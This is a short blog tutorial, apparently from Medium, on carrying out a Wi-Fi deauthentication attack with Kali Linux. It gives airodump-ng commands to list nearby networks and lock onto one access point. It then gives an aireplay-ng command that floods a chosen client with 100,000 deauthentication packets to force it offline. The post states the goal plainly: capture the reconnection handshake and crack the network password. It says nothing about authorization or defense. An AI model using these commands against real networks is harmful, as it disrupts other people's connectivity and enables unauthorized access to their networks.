[ Kali Linux ] Wi-Fi Deauthentication Attack

Aki
2 min readApr 13, 2021

--

This attack is very useful because it againsts all operating systems as long as it uses wi-fi. Moreover, it works without the need to know the key or password to the target network and forces target to disconnect the network. Once they reconnect to it, we can intercept the handshake packet to break the wi-fi password!

If you want to run this attack, make sure your wireless adapter supports monitor mode! You can click the link below this article to set it up.

Run the command to get the wireless network list around you.

Command usage : airodump-ng [options] <interface name>

root@kali:~# airodump-ng wlan0

The result of it :

result-of-airodump-ng

Once you have your target on it, then you can do the deeper scan for it. We will use the same command, but different options :

root@kali:~# airodump-ng --channel 11 --bssid 40:16:7E:5D:79:90 wlan0

The result of it :

deep-scan-of-airodump-ng

There are two devices connect to this access point. We are gonna attack one of them. The command is very similar to airodump-ng.

Command usage : aireplay-ng [options] <replay interface>

root@kali:~# aireplay-ng --deauth 100000 -a 40:16:7E:5D:79:90 -c 2E:4A:E4:98:15:95 wlan0

The result of it :

result-of-deauthentication-attack

As the result, we can see our wireless adapter keeps sending the deauthentication packet to the target and makes target lost its network.

If you want to check any command’s detail, you can see the manual by :

root@kali:~# man airodump-ng

or:

root@kali:~# airodump-ng --help

How to change your wireless adapter to monitor mode :

--

--

Aki
Aki

No responses yet